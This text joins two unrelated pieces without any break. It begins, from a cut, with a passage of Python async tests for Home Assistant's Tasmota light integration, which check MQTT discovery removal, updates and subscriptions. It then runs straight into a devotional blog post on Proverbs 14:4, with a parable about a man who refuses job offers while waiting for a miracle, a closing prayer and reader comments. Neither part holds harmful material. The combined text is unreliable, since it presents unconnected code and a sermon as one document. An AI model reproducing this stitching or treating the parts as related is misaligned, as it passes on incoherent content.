light.DOMAIN, config1, config2 ) async def test_discovery_removal_relay_as_light(hass, mqtt_mock, caplog, setup_tasmota): """Test removal of discovered relay as light.""" config1 = copy.deepcopy(DEFAULT_CONFIG) config1["rl"][0] = 1 config1["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light config2 = copy.deepcopy(DEFAULT_CONFIG) config2["rl"][0] = 1 config2["so"]["30"] = 0 # Disable Home Assistant auto-discovery as light await help_test_discovery_removal( hass, mqtt_mock, caplog, light.DOMAIN, config1, config2 ) async def test_discovery_removal_relay_as_light2( hass, mqtt_mock, caplog, setup_tasmota ): """Test removal of discovered relay as light.""" config1 = copy.deepcopy(DEFAULT_CONFIG) config1["rl"][0] = 1 config1["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light config2 = copy.deepcopy(DEFAULT_CONFIG) config2["rl"][0] = 0 config2["so"]["30"] = 0 # Disable Home Assistant auto-discovery as light await help_test_discovery_removal( hass, mqtt_mock, caplog, light.DOMAIN, config1, config2 ) async def test_discovery_update_unchanged_light(hass, mqtt_mock, caplog, setup_tasmota): """Test update of discovered light.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) with patch( "homeassistant.components.tasmota.light.TasmotaLight.discovery_update" ) as discovery_update: await help_test_discovery_update_unchanged( hass, mqtt_mock, caplog, light.DOMAIN, config, discovery_update ) async def test_discovery_device_remove(hass, mqtt_mock, setup_tasmota): """Test device registry remove.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) unique_id = f"{DEFAULT_CONFIG['mac']}_light_light_0" await help_test_discovery_device_remove( hass, mqtt_mock, light.DOMAIN, unique_id, config ) async def test_discovery_device_remove_relay_as_light(hass, mqtt_mock, setup_tasmota): """Test device registry remove.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light unique_id = f"{DEFAULT_CONFIG['mac']}_light_relay_0" await help_test_discovery_device_remove( hass, mqtt_mock, light.DOMAIN, unique_id, config ) async def test_entity_id_update_subscriptions(hass, mqtt_mock, setup_tasmota): """Test MQTT subscriptions are managed when entity_id is updated.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) topics = [ get_topic_stat_result(config), get_topic_tele_state(config), get_topic_tele_will(config), ] await help_test_entity_id_update_subscriptions( hass, mqtt_mock, light.DOMAIN, config, topics ) async def test_entity_id_update_discovery_update(hass, mqtt_mock, setup_tasmota): """Test MQTT discovery update when entity_id is updated.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) await help_test_entity_id_update_discovery_update( hass, mqtt_mock, light.DOMAIN, config )
Daily Inspiration from Proverbs 14 P.162 – Got Oxen? Daily Inspiration from These Verses – Got Oxen? This is a simple little verse, that packs a wallop of meaning. Well, at least it does in my opinion. As it says above, with no oxen, the crib is clean, but were there oxen present, the crib would be a mess. But, despite the mess, oxen are beasts of burden. This means things are happening. Work is being done, and whatever the mess that they leave behind, is peanuts compared to the work they’ve accomplished. This verse is leading us to believe, that it is better to have an ox, than to be without one. Now, I know I don’t have any ox to put to work for me. And if I did, I’m not sure what I’d have him do. Because to public transportation regulations, getting it to the office to program parts using computer aided design software would prove difficult. Not a lot of rights if you’re an ox around here. Alright, I’m being a bit silly, but I think you know what I’m saying. We don’t need an ox or a farm, in order to relate to the verse above. I’d like to set aside the example that is being used, and use another one, that we all might be able to relate to a little easier. There was a man who was without a job, with a rather large overdue car payment that was scheduled to have action taken upon a couple of months out. Every day, he would pray to the Lord, for a miracle, that the money would come in somehow. One day, the phone rings, and it happens to be someone from a company, having read his resume online, wanted to grant him an interview. But the man, being a devout Christian, stood by faith, and said,”Thank you sir, but I’m believing God to supply all my needs through his riches and glory.” Then hung up the phone. Next day comes, the phone rings again. It’s someone from a different company, looking to hire this gentleman. He again stands in faith, and repeats what he told the first person. Day after day, week after week, he remained steadfast in prayer, and received calls for work constantly, but would not take a job, due to his faith in the Lord, that his miracle is coming. Now, what’s due is a week away, and he’s praying harder than ever, even in tears at times. As the due date creeps closer, the daily phone calls cease. The date comes and passes, and he remains steadfast in prayer, now for fear of what’s coming his way due to missing the due date. Then one day, he wakes up to the sound of a tow truck, driving out of his yard with his vehicle in tow. Then after months of prayer, this same man reckoned that it just wasn’t God’s will for him to have kept the car. What is wrong with the picture that I painted for you above? The crib was empty, and despite every attempt by the Father, to help this guy out, the man never gave it a thought. The reason (and I think we all do this from time to time) would be, because he assumed that the Lord was just going to do things the way the man wanted him to, rather than the way he willed to do it. It was the Lord’s intervention, causing employers to suddenly look favorably upon his resume online, and to call and try to hire him. That’s how the Lord willed for him to have the money. But because that’s not what the guy wanted, or was expecting, he left himself on the hook, wondering why God didn’t answer all of his prayers. Nobody wants to clean a dirty stall, right? Some people expect things to be handed to them, without having to get the stall dirty. Sure, God at times, should he will to do so, will do something miraculous to answer prayer. But never suppose that it is his will to take the easy route for anything. As a former production worker, I can tell you with certainty, that production is a messy thing, and at the end of the day, the place will need a cleaning. Rarely if ever, does the Lord do something how and when we think he should. Particularly as it relates to gain. Who wouldn’t want the Father to dump cash in their laps miraculously? What a surprise and a blessing that would be, particularly if it’s needed! But if that’s what you’re waiting for, don’t be disappointed when it doesn’t happen the way you had hoped, and come to find that there are many things that you’ll need to do, to get that increase. It’s not his problem that he doesn’t do things as or when we think he should. It’s our problem, thinking that God Almighty, Creator of all that there ever is or was, needs our advice as to how to do things. It is we who need to adhere to his ways, not the other way around. Even if you need to keep cleaning the stall, there’s more progress being made than there would be staring into an empty one. 9 For it is written in the law of Moses, thou shalt not muzzle the mouth of the ox that treadeth out the corn. Doth God take care for oxen? 10 Or saith he it altogether for our sake? For our sake, no doubt, this is written: that he that ploweth should plow in hope; and that he that thresheth in hope should be partaker of his hope. So often we ask things of you, and it could be, that we’re in err in how we’re expecting to receive from you. Where there are things we need to do something, give us clear instructions and lead us into the place where you have designed for us to be. Please Father, let us not shy away from, or think differently than, the way you want us to do things. Bless us all to be a blessing Father, and teach us what you would have us do through your Holy Ghost, and through your Word. In the name of the Lord Jesus Christ. Have you ever noticed that more often than not, when you prayed for grain, instead you got oxen? Thanks Brian…yes, the Lord does provide for us, quite often as you pointed out. The Lord can open doors for a new job, better location than prvious ones, at a higher pay rate etc. All of these examples are the Lord’s way of providing for us to have a better life, if we let Him work. By the way, living in a large rice growing valley, the oxen are used here to prepare the soil for the planting of the rice, which is going on right now (the start of the wet season). The Lord’s peace to you…Amen. Thanks for your comment and your kind words. It seems to me that you’ve got a great example of Proverbs 14;4 being fulfilled right around your home!God bless you Brother, and stay safe out there! May the Lord bless you everywhere you go in Jesus name!